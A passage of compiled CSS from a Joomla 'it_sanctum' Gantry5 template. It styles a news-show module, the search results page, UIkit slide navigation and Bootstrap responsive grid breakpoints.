/* line 114, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-image-link {
  position: relative;
}
/* line 116, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 117, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-image-link:hover .ns2-image-overlay {
  opacity: 1;
}
@media only all and (max-width: 30rem) {
  .nssp2 .ns2-image-link {
    margin-bottom: 15px;
  }
}
/* line 125, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-image-overlay {
  background: rgba(0, 0, 0, 0.5);
  color: #fff;
  padding: 20px;
  position: absolute;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  opacity: 0;
  -webkit-transition: opacity 0.3s;
  -moz-transition: opacity 0.3s;
  transition: opacity 0.3s;
}
/* line 136, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-image-overlay:before {
  font-size: 25px;
  height: 25px;
  width: 25px;
  margin-left: -11px;
  margin-top: -17px;
  color: #fff;
  position: absolute;
  left: 50%;
  top: 50%;
  content: "\f0c1";
  font-family: FontAwesome;
}
/* line 151, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap {
  position: relative;
}
/* line 153, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers {
  position: absolute;
  top: -58px;
  right: 0;
}
/* line 157, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-play, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-play, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pause, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pause, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span {
  background: none;
  text-indent: 0;
  height: auto;
  width: auto;
}
/* line 163, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 164, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span {
  color: #959595;
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 167, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-pagination span.active, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-pagination span.active {
  color: #c8c8c8;
}
/* line 172, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next {
  padding: 5px 10px;
  background: #4f953b;
  color: #fff;
  border-radius: 3px;
  font-size: 11px;
  margin-top: -4px;
  margin-right: 0;
  margin-left: 5px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 182, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev i, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev i, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next i, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next i {
  vertical-align: middle;
}
/* line 185, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-prev:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-prev:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-art-next:hover, .nssp2 .ns2-wrap .ns2-art-controllers .ns2-links-next:hover {
  background: #282828;
}
/* line 193, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 194, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 195, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .nssp2 .ns2-title {
  font-size: 0.9rem;
  margin: 0;
}
/* line 200, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 201, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .ns2-page-inner-custom > div {
  margin: 0;
  border-bottom: 1px solid #353535;
}
/* line 204, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .ns2-page-inner-custom > div:last-child {
  border: none;
}
/* line 206, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 207, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .ns2-page-inner-custom > div:last-child .ns2-column > div {
  padding-bottom: 0 !important;
}
/* line 213, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 214, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
/* line 215, templates/it_sanctum/scss/sanctum-joomla/_nssp2.scss */
.footer .ns2-page-inner-custom .ns2-first .ns2-column > div {
  padding-top: 0 !important;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results {
  width: 500px;
  margin: 0 auto;
  text-align: center;
  padding: 50px;
  border: 1px solid #ddd;
  margin-bottom: 70px;
}
@media only all and (max-width: 47.938rem) {
  .search .search-form-results {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .search .search-form-results {
    width: 100%;
  }
}
/* line 15, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar {
  margin-top: 0;
}
/* line 17, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar .btn-group {
  float: none;
  margin: 0;
}
/* line 20, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar .btn-group input {
  width: 100%;
  margin: 0;
  border-right: none;
}
@media only all and (max-width: 30rem) {
  .search .search-form-results .btn-toolbar .btn-group input {
    width: 120px;
  }
}
/* line 28, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar .btn-group .btn {
  padding: 0.58rem 1rem !important;
  border-radius: 0 !important;
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .btn-toolbar .btn-group .btn > span {
  vertical-align: middle;
  margin: 0;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
/* line 39, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .searchintro > p {
  margin-bottom: 0;
}
/* line 42, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-form-results .searchintro .badge {
  background: #4f953b;
  border-radius: 0;
  text-shadow: none;
}
/* line 49, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-add-options {
  padding: 50px;
  border: 1px solid #ddd;
  margin: 0 auto 50px;
  width: 600px;
}
@media only all and (max-width: 47.938rem) {
  .search .search-add-options {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .search .search-add-options {
    width: 100%;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .search .search-add-options {
    width: 550px;
  }
}
/* line 63, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-add-options > fieldset {
  display: inline-block;
}
/* line 65, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-add-options > fieldset:first-child {
  margin-right: 50px;
}
@media only all and (max-width: 47.938rem) {
  .search .search-add-options > fieldset:first-child {
    margin-bottom: 50px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .search .search-add-options > fieldset:first-child {
    margin-bottom: 50px;
  }
}
/* line 76, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
/* line 77, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item {
  padding: 40px 0 40px 50px;
  border-top: 1px solid #ddd;
  position: relative;
}
/* line 81, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .item-number {
  position: absolute;
  left: 0;
  border: 1px solid #ddd;
  text-align: center;
  width: 30px;
  height: 30px;
  line-height: 30px;
  border-radius: 0;
}
/* line 91, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .result-title {
  line-height: 30px;
}
/* line 93, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
/* line 94, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .result-title h4 a {
  color: #282828;
}
/* line 96, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .result-title h4 a:hover {
  color: #4f953b;
}
/* line 102, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item dd {
  margin: 0;
}
/* line 105, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .search-item-info {
  margin-top: 20px;
}
/* line 107, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .search-item-info dd {
  display: inline-block;
  margin-right: 20px;
}
/* line 110, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .search-item-info dd i {
  margin-right: 7px;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 3, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 4, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-dotnav > * > *, .uk-dotnav-contrast > * > * {
  border-radius: 0px !important;
  background: rgba(0, 0, 0, 0.1) !important;
}
/* line 9, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 10, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-dotnav > .uk-active > *, .uk-dotnav-contrast > .uk-active > * {
  background: rgba(0, 0, 0, 0.2) !important;
}
/* line 16, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 17, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 18, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.g-container .uk-slidenav-position .uk-slidenav {
  border-radius: 0;
  background: transparent;
  font-size: 50px;
  color: rgba(0, 0, 0, 0.3);
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 24, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.g-container .uk-slidenav-position .uk-slidenav:hover {
  color: #4f953b;
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 32, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 33, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-modal .uk-slidenav-position .uk-slidenav {
  border-radius: 0;
  background: transparent;
  font-size: 50px;
  color: rgba(0, 0, 0, 0.3);
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 39, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-modal .uk-slidenav-position .uk-slidenav:hover {
  color: #4f953b;
}
/* line 46, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-grid-divider > * {
  padding-left: 35px !important;
  margin-bottom: 20px !important;
}
@media only all and (max-width: 47.938rem) {
  /* line 2, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-top, .navbar-fixed-bottom, .navbar-static-top {
    margin-right: -20px;
    margin-left: -20px;
  }
  /* line 8, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .container-fluid {
    padding: 0;
  }
  /* line 11, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .dl-horizontal dt {
    float: none;
    width: auto;
    clear: none;
    text-align: left;
  }
  /* line 17, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .dl-horizontal dd {
    margin-left: 0;
  }
  /* line 20, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid {
    width: 100%;
  }
  /* line 23, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row, .thumbnails {
    margin-left: 0;
  }
  /* line 27, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .thumbnails > li {
    float: none;
    margin-left: 0;
  }
  /* line 32, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .manager.thumbnails > li {
    float: left;
    margin-left: 20px;
  }
  /* line 37, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  [class*="span"], .uneditable-input[class*="span"], .row-fluid [class*="span"] {
    display: block;
    float: none;
    width: 100%;
    margin-left: 0;
    box-sizing: border-box;
  }
  /* line 46, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span12, .row-fluid .span12 {
    width: 100%;
    box-sizing: border-box;
  }
  /* line 51, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid [class*="offset"]:first-child {
    margin-left: 0;
  }
  /* line 54, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .input-large, .input-xlarge, .input-xxlarge, input[class*="span"], select[class*="span"], textarea[class*="span"], .uneditable-input {
    display: block;
    width: 100%;
    min-height: 30px;
    box-sizing: border-box;
  }
  /* line 66, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .input-prepend input, .input-append input, .input-prepend input[class*="span"], .input-append input[class*="span"] {
    display: inline-block;
    width: auto;
  }
  /* line 73, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .controls-row [class*="span"] + [class*="span"] {
    margin-left: 0;
  }
}
@media only all and (max-width: 30rem) {
  /* line 79, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse {
    -webkit-transform: translate3d(0, 0, 0);
  }
  /* line 82, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .page-header h1 small {
    display: block;
    line-height: 20px;
  }
  /* line 86, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .form-horizontal .control-label {
    float: none;
    width: auto;
    padding-top: 0;
    text-align: left;
  }
  /* line 92, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .form-horizontal .controls {
    margin-left: 0;
  }
  /* line 95, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .form-horizontal .control-list {
    padding-top: 0;
  }
  /* line 98, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .form-horizontal .form-actions {
    padding-right: 10px;
    padding-left: 10px;
  }
  /* line 102, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .media .pull-left, .media .pull-right {
    display: block;
    float: none;
    margin-bottom: 10px;
  }
  /* line 108, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .media-object {
    margin-right: 0;
    margin-left: 0;
  }
  /* line 112, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .modal-header .close {
    padding: 10px;
    margin: -10px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  /* line 119, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row {
    margin-left: -20px;
  }
  /* line 122, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row:before, .row:after {
    display: table;
    line-height: 0;
    content: "";
  }
  /* line 128, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row:after {
    clear: both;
  }
  /* line 131, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  [class*="span"] {
    float: left;
    min-height: 1px;
    margin-left: 20px;
  }
  /* line 136, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span12 {
    width: 724px;
  }
  /* line 139, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span11 {
    width: 662px;
  }
  /* line 142, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span10 {
    width: 600px;
  }
  /* line 145, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span9 {
    width: 538px;
  }
  /* line 148, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span8 {
    width: 476px;
  }
  /* line 151, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span7 {
    width: 414px;
  }
  /* line 154, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span6 {
    width: 352px;
  }
  /* line 157, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span5 {
    width: 290px;
  }
  /* line 160, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span4 {
    width: 228px;
  }
  /* line 163, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span3 {
    width: 166px;
  }
  /* line 166, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span2 {
    width: 104px;
  }
  /* line 169, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span1 {
    width: 42px;
  }
  /* line 172, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset12 {
    margin-left: 764px;
  }
  /* line 175, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset11 {
    margin-left: 702px;
  }
  /* line 178, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset10 {
    margin-left: 640px;
  }
  /* line 181, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset9 {
    margin-left: 578px;
  }
  /* line 184, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset8 {
    margin-left: 516px;
  }
  /* line 187, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset7 {
    margin-left: 454px;
  }
  /* line 190, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset6 {
    margin-left: 392px;
  }
  /* line 193, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset5 {
    margin-left: 330px;
  }
  /* line 196, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset4 {
    margin-left: 268px;
  }
  /* line 199, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset3 {
    margin-left: 206px;
  }
  /* line 202, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset2 {
    margin-left: 144px;
  }
  /* line 205, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset1 {
    margin-left: 82px;
  }
  /* line 208, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid {
    width: 100%;
  }
  /* line 211, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid:before, .row-fluid:after {
    display: table;
    line-height: 0;
    content: "";
  }
  /* line 217, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid:after {
    clear: both;
  }
  /* line 220, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid [class*="span"] {
    display: block;
    float: left;
    width: 100%;
    min-height: 30px;
    margin-left: 2.7624309392%;
    box-sizing: border-box;
  }
  /* line 228, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid [class*="span"]:first-child {
    margin-left: 0;
  }
  /* line 231, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .controls-row [class*="span"] + [class*="span"] {
    margin-left: 2.7624309392%;
  }
  /* line 234, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span12 {
    width: 100%;
  }
  /* line 237, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span11 {
    width: 91.4364640884%;
  }
  /* line 240, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span10 {
    width: 82.8729281768%;
  }
  /* line 243, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span9 {
    width: 74.3093922652%;
  }
  /* line 246, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span8 {
    width: 65.7458563536%;
  }
  /* line 249, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span7 {
    width: 57.182320442%;
  }
  /* line 252, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span6 {
    width: 48.6187845304%;
  }
  /* line 255, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span5 {
    width: 40.0552486188%;
  }
  /* line 258, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span4 {
    width: 31.4917127072%;
  }
  /* line 261, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span3 {
    width: 22.9281767956%;
  }
  /* line 264, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span2 {
    width: 14.364640884%;
  }
  /* line 267, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span1 {
    width: 5.8011049724%;
  }
  /* line 270, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset12 {
    margin-left: 105.5248618785%;
  }
  /* line 273, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset12:first-child {
    margin-left: 102.7624309392%;
  }
  /* line 276, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset11 {
    margin-left: 96.9613259669%;
  }
  /* line 279, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset11:first-child {
    margin-left: 94.1988950276%;
  }
  /* line 282, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset10 {
    margin-left: 88.3977900552%;
  }
  /* line 285, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset10:first-child {
    margin-left: 85.635359116%;
  }
  /* line 288, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset9 {
    margin-left: 79.8342541436%;
  }
  /* line 291, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset9:first-child {
    margin-left: 77.0718232044%;
  }
  /* line 294, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset8 {
    margin-left: 71.270718232%;
  }
  /* line 297, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset8:first-child {
    margin-left: 68.5082872928%;
  }
  /* line 300, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset7 {
    margin-left: 62.7071823204%;
  }
  /* line 303, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset7:first-child {
    margin-left: 59.9447513812%;
  }
  /* line 306, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset6 {
    margin-left: 54.1436464088%;
  }
  /* line 309, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset6:first-child {
    margin-left: 51.3812154696%;
  }
  /* line 312, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset5 {
    margin-left: 45.5801104972%;
  }
  /* line 315, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset5:first-child {
    margin-left: 42.817679558%;
  }
  /* line 318, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset4 {
    margin-left: 37.0165745856%;
  }
  /* line 321, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset4:first-child {
    margin-left: 34.2541436464%;
  }
  /* line 324, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset3 {
    margin-left: 28.453038674%;
  }
  /* line 327, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset3:first-child {
    margin-left: 25.6906077348%;
  }
  /* line 330, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset2 {
    margin-left: 19.8895027624%;
  }
  /* line 333, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset2:first-child {
    margin-left: 17.1270718232%;
  }
  /* line 336, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset1 {
    margin-left: 11.3259668508%;
  }
  /* line 339, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset1:first-child {
    margin-left: 8.5635359116%;
  }
  /* line 342, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input, textarea, .uneditable-input {
    margin-left: 0;
  }
  /* line 347, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .controls-row [class*="span"] + [class*="span"] {
    margin-left: 20px;
  }
  /* line 350, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span12, textarea.span12, .uneditable-input.span12 {
    width: 710px;
  }
  /* line 355, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span11, textarea.span11, .uneditable-input.span11 {
    width: 648px;
  }
  /* line 360, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span10, textarea.span10, .uneditable-input.span10 {
    width: 586px;
  }
  /* line 365, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span9, textarea.span9, .uneditable-input.span9 {
    width: 524px;
  }
  /* line 370, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span8, textarea.span8, .uneditable-input.span8 {
    width: 462px;
  }
  /* line 375, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span7, textarea.span7, .uneditable-input.span7 {
    width: 400px;
  }
  /* line 380, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span6, textarea.span6, .uneditable-input.span6 {
    width: 338px;
  }
  /* line 385, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span5, textarea.span5, .uneditable-input.span5 {
    width: 276px;
  }
  /* line 390, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span4, textarea.span4, .uneditable-input.span4 {
    width: 214px;
  }
  /* line 395, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span3, textarea.span3, .uneditable-input.span3 {
    width: 152px;
  }
  /* line 400, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span2, textarea.span2, .uneditable-input.span2 {
    width: 90px;
  }
  /* line 405, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span1, textarea.span1, .uneditable-input.span1 {
    width: 28px;
  }
}
@media only all and (max-width: 59.938rem) {
  /* line 413, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-top, .navbar-fixed-bottom {
    position: static;
  }
  /* line 417, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-top {
    margin-bottom: 20px;
  }
